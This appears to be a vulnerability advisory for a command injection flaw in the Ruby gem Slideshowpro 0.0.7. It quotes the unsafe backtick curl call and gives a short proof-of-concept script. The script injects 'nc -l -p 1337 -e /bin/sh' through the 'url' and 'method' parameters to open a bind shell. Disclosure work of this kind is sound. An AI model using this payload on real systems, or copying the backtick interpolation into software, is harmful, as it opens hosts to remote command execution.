Ruby Gem Slideshowpro v0.0.7 Command Execution

[bcoles]

The Ruby Gem Slideshowpro version 0.0.7 may be vulnerable to command execution
in the './lib/slideshowpro/director.rb' file if the implementation allows a
user to control the 'url' parameter during class initialization or the 'method'
parameter during a call to the 'post' function.

Proof of concept

The following proof of concept is available:

#!/usr/bin/env ruby
require "rubygems"
require "bundler/setup"
require "slideshowpro"
payload = 'nc -l -p 1337 -e /bin/sh'
# create object #
ssp = Slideshowpro::Director.new('http://localhost/\";'+payload+';echo \"', '')
# trigger exploit #
poc = ssp.post(';'+payload+';#', {})

Vulnerable code

The 'post(method, options)' function in './lib/slideshowpro/director.rb' passes
both the local function parameter 'method' and the public object property 'url'
to the protected function 'get_json(url, method, data)' on lines 24, 29 and 32:

        rescue Memcached::NotFound
          json = get_json(url, method, data) # line 24
          self.cache.set(data_key, json)
        rescue Memcached::ServerIsMarkedDead
          puts "Memcache Down!"
          #fall back to get data directly
          json = get_json(url, method, data) # line 29
        end
      else
        json = get_json(url, method, data)   # line 32

The protected function 'get_json(url, method, data)' uses the local function
parameters 'url' and 'method' between backticks on line 68:

    def get_json(url, method, data)
        puts "requesting #{url+method} with #{data.inspect}" if $debug
        response = `curl --silent #{url+method} --data "#{data}"` # line 68
        puts "recieved: #{response}" if $debug
      Crack::JSON.parse(response)
    end